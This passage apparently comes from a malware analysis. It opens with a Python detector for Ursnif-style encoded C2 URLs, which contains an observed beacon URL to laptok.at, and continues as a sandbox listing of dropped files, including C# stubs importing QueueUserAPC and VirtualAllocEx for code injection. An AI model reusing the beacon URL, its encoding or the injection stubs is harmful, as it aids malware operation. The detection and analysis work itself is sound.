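    "http://api10.laptok.at/api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7",
]

# Negatives: the IE resource URL from this report, and a constructed CDN-style path
# whose single '_2f' must not trigger the detector.
BENIGN_URLS: List[str] = [
    "res://ieframe.dll/bullet.png",
    "https://cdn.example.com/static/js/vendor/app_2f3a.min.js",
]

ESCAPE_RE = re.compile(r"_[0-9A-Fa-f]{2}")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def normalize_ursnif_path(url: str) -> str:
    """Undo the transport encoding and return the base64 text the path carried.

    Order matters: the '/' separators are removed first, because the malware inserts
    them at arbitrary offsets and they can land inside an escape; only then is '_XX'
    treated as '%XX' and percent-decoded. CR/LF (from '_0D'/'_0A') are stripped last.
    """
    path = urlsplit(url).path.strip("/")
    # Assumption: the first directory ('api1' here) is a fixed prefix, not payload.
    _prefix, _sep, rest = path.partition("/")
    joined = rest.replace("/", "")
    decoded = unquote(joined.replace("_", "%"))
    return decoded.replace("\r", "").replace("\n", "")


def is_ursnif_style_uri(url: str, min_escapes: int = 3, min_len: int = 64) -> bool:
    """Heuristic: many pseudo-directories, several '_XX' escapes, and a payload that
    is pure base64 once the encoding is undone."""
    path = urlsplit(url).path
    if path.count("/") < 4:
        return False
    escapes = len(ESCAPE_RE.findall(path.replace("/", "")))
    payload = normalize_ursnif_path(url)
    return (escapes >= min_escapes
            and len(payload) >= min_len
            and BASE64_RE.match(payload) is not None)


def recover_ciphertext(url: str) -> Optional[bytes]:
    """Base64-decode the carried payload. The result is still ciphertext (the report
    has no key), so this only confirms the blob is well formed and gives its size."""
    payload = normalize_ursnif_path(url).rstrip("=")
    try:
        return base64.b64decode(payload + "=" * (-len(payload) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def triage(urls: List[str]) -> Dict[str, Dict[str, object]]:
    """Per-URL summary suitable for sweeping a proxy log."""
    result: Dict[str, Dict[str, object]] = {}
    for url in urls:
        parts = urlsplit(url)
        hit = is_ursnif_style_uri(url)
        blob = recover_ciphertext(url) if hit else None
        result[url] = {
            "host": parts.netloc,
            "ursnif_style": hit,
            "escapes": len(ESCAPE_RE.findall(parts.path.replace("/", ""))),
            "ciphertext_len": len(blob) if blob is not None else None,
        }
    return result


if __name__ == "__main__":
    for url, info in triage(OBSERVED_URLS + BENIGN_URLS).items():
        print(info["ursnif_style"], info["host"], info["escapes"],
              info["ciphertext_len"], url[:60])
```

The detector keys on structure rather than on the `laptok.at` host, so it still fires when the sample rotates domains; the host is only reported for pivoting. Decoding per segment would break on the split escapes, which is why the slashes are removed before the `_XX` replacement.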
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):6495
                                                                                                                                      Entropy (8bit):3.8998802417135856
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                      MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                      SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                      SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                      SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                      Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):4113
                                                                                                                                      Entropy (8bit):7.9370830126943375
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                      MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                      SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                      SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                      SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                      Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11606
                                                                                                                                      Entropy (8bit):4.883977562702998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                                                                                                      MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                                                                                                      SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                                                                                                      SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                                                                                                      SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64
                                                                                                                                      Entropy (8bit):0.9260988789684415
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                                                      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                                                      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                                                      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                                                      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: @...e................................................@..........
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.0.cs
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):402
                                                                                                                                      Entropy (8bit):5.038590946267481
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
                                                                                                                                      MD5:D318CFA6F0AA6A796C421A261F345F96
                                                                                                                                      SHA1:8CC7A3E861751CD586D810AB0747F9C909E7F051
                                                                                                                                      SHA-256:F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
                                                                                                                                      SHA-512:10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):369
                                                                                                                                      Entropy (8bit):5.313360961388429
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fe0Uzxs7+AEszIWXp+N23feSn:p37Lvkmb6KHqWZE8Pn
                                                                                                                                      MD5:2DB8879E193202C9BF2E53E6BFED2AA0
                                                                                                                                      SHA1:B70B1517052DE8E7C4936A6032542D18B2000AA0
                                                                                                                                      SHA-256:01A4228FF2F9F3B587C24468C7F3EE08DC64259C9BDC1E4FA0AD35F6BBDAB4B9
                                                                                                                                      SHA-512:495DF850BFE8CEB6CED15B037F6571F0CCBCB5B5EB3F21C2F40F3D7EE1F213CDD0BFC58E86AC054987284756E5765B4321DDDB1B71D7E4C177B27A263F6CA87B
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.0.cs"
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3584
                                                                                                                                      Entropy (8bit):2.6201282755446322
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:etGSpW/W2Dg85xL/XsB4zJL4zqhRqPPtkZfGmNn+II+ycuZhNHakSpPNnq:6xWb5xL/OGbuuJlRn1ulHa3Lq
                                                                                                                                      MD5:A5F27D62E9CA8D216BD8677A014C1E9F
                                                                                                                                      SHA1:48745A1788FDCCBF3BE6F7BEC72A926A28E1CA99
                                                                                                                                      SHA-256:623AB8A49F0ED911BF70DA44A71F47EBB1BDCE091A80B4C77EB25E60337D7451
                                                                                                                                      SHA-512:E1849B68778B01881F8E4246BEDC113CBA95F483C0C9F38EA713F31635CA121515F65939B2D38DD0316DF44E9BED84C20B293CA351411042B1D455080A2F13D8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a.......*.....3./.....6.......C.......V................................................<Module>.1453igkk.dll.tba.W32.mscorlib.Syst
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.out
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):412
                                                                                                                                      Entropy (8bit):4.871364761010112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:MSVC .res
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):3.1156819456479257
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKfnGak7YnqqhfnXPN5Dlq5J:+RI+ycuZhNHakSpPNnqX
                                                                                                                                      MD5:52FBC8B242036E953D34FB77648B8CA7
                                                                                                                                      SHA1:44B9D1FABA6237FD3EC21C1CB5EA552BE904EB25
                                                                                                                                      SHA-256:A414B782A372D8D104F08A38DD596DA5D4F2A1A2E251EB596000D28CB6A808E2
                                                                                                                                      SHA-512:8C43DDC7C1A66790678DF83E8CC41C6DB731FFFB15EC5AD4F2DB0708DCF60D81B23853A04A0690D5B66D2F8212D8C9D280DD585DFCEC0C94ADDC165C3CF8EAB7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.4.5.3.i.g.k.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.4.5.3.i.g.k.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                      C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):89
                                                                                                                                      Entropy (8bit):4.214875319651327
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:oVXVPMfFfVQLU0qmW8JOGXnFPMfFfVQLU0Zun:o9QF9QLU0iqgF9QLU0Zu
                                                                                                                                      MD5:C761F30D7AA0B615632114F8048E36F6
                                                                                                                                      SHA1:0654CFC40DA2F1F93E8EF23E8E5BEF11ADC3FF8B
                                                                                                                                      SHA-256:429DF2245415C117E29A61D8C318D5A8037D13458A0A326208BF1058A2FB91CB
                                                                                                                                      SHA-512:1218CDFA05793495D3D26EBFBFBF759347DD4A4EC9E4660AD93262AE24D1913C583FBB0C0D7A51F6C0FCD6BD98474181F6E1847A1E577478FDBCB41320C21A03
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: [2020/11/24 21:20:05.162] Latest deploy version: ..[2020/11/24 21:20:05.162] 11.211.2 ..
                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES8664.tmp
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2184
                                                                                                                                      Entropy (8bit):2.70956465433161
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:pgKLhHdVFhKdNNI+ycuZhNHakSpPNnq9qpnie9Ep:KK19VzKd31ulHa3Lq9uw
                                                                                                                                      MD5:F312FDCCB14F8E901F73C2077C51793C
                                                                                                                                      SHA1:18ADB28339D8CE374944AD74AC42447CF8595A02
                                                                                                                                      SHA-256:07DE661EE9480141E11DC5B82CC0B16B6D632C83B8FB583C4879CAA09ACACA42
                                                                                                                                      SHA-512:AB124BEA9705D985F3E573F8DC6C56DF6F3F88A2C4FE2F007022596498BC2C7EDF297DA91628EC7190EB9A27902BEE86F932226756048EF5CB8F087B75FC6BE0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP...............R..B.n.=4.wd.............4.......C:\Users\user\AppData\Local\Temp\RES8664.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES9384.tmp
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2184
                                                                                                                                      Entropy (8bit):2.7068645236556512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:bP6eRhHlhKdNNI+ycuZhNvuakScvPNnq9qpuhie9Ep:bPXDzKd31ulma3Sq93hw
                                                                                                                                      MD5:E50A6C8BC0F94622EB97ABF57EF8D1C6
                                                                                                                                      SHA1:F5735A7C74B6CF1930CB6AF6F7FCC01EF275121D
                                                                                                                                      SHA-256:D18B307D5E7E38D78D1C0D868BEF19307AA4D60CDB225537773D740C8E1AC4A1
                                                                                                                                      SHA-512:EFD48BEE39D7279CCDEBB0E867740D75D99A9053403E261A99C21FBA55F77BAC42618412F08C103A0A6C40685193EFCD5BA241035B3CB7F045CA30FB684A84F7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ........S....c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP..................g..O....r..............4.......C:\Users\user\AppData\Local\Temp\RES9384.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvnvbiu0.gck.ps1
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: 1
                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5u3jvqp.syn.psm1
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: 1
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:MSVC .res
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):3.0849692938644355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytuak7YnqqcvPN5Dlq5J:+RI+ycuZhNvuakScvPNnqX
                                                                                                                                      MD5:94D1679D1D4FEFD1EF2E72D0E7ABF5B2
                                                                                                                                      SHA1:AAC4640124B24ED06E8D7588C04AFCC9F534D707
                                                                                                                                      SHA-256:4C6512C3975A9BC03A4D0D45FF7274B75EFA247D42475BA3252FC6C288290AD5
                                                                                                                                      SHA-512:FDA5BB5791C6634031BA7E0C3D6A98880059302323DFE0F0E3F973599C14789D7BBAE662A58E357704504C9CBAE38F429B2310AAC2332AFDEA51E7344AE4C09C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.e.r.y.0.d.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.e.r.y.0.d.b.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.cs
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):414
                                                                                                                                      Entropy (8bit):5.000775845755204
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
                                                                                                                                      MD5:216105852331C904BA5D540DE538DD4E
                                                                                                                                      SHA1:EE80274EBF645987E942277F7E0DE23B51011752
                                                                                                                                      SHA-256:408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
                                                                                                                                      SHA-512:602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):369
                                                                                                                                      Entropy (8bit):5.236555817911529
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f7ozxs7+AEszIWXp+N23f76An:p37Lvkmb6KHToWZE8Tl
                                                                                                                                      MD5:9EA6B9D595456E5B23DEA4B11806F78F
                                                                                                                                      SHA1:C4487B9542B629D31FC73B8CADD37D6C4CDA53D1
                                                                                                                                      SHA-256:D85066A82597D6622DE17EEC3E20F97C87204B48220F99A7B19899C0B663A34E
                                                                                                                                      SHA-512:9D85F4C83ECA80E0BE1FB57842CB3E8FD85362ED3592850316B73F41BA7C018F0A5E7A62B08A3ACADEC7B29F2BEC2AF55C09D16F70333D6907E4EB441CBE5BA5
                                                                                                                                      Malicious:false
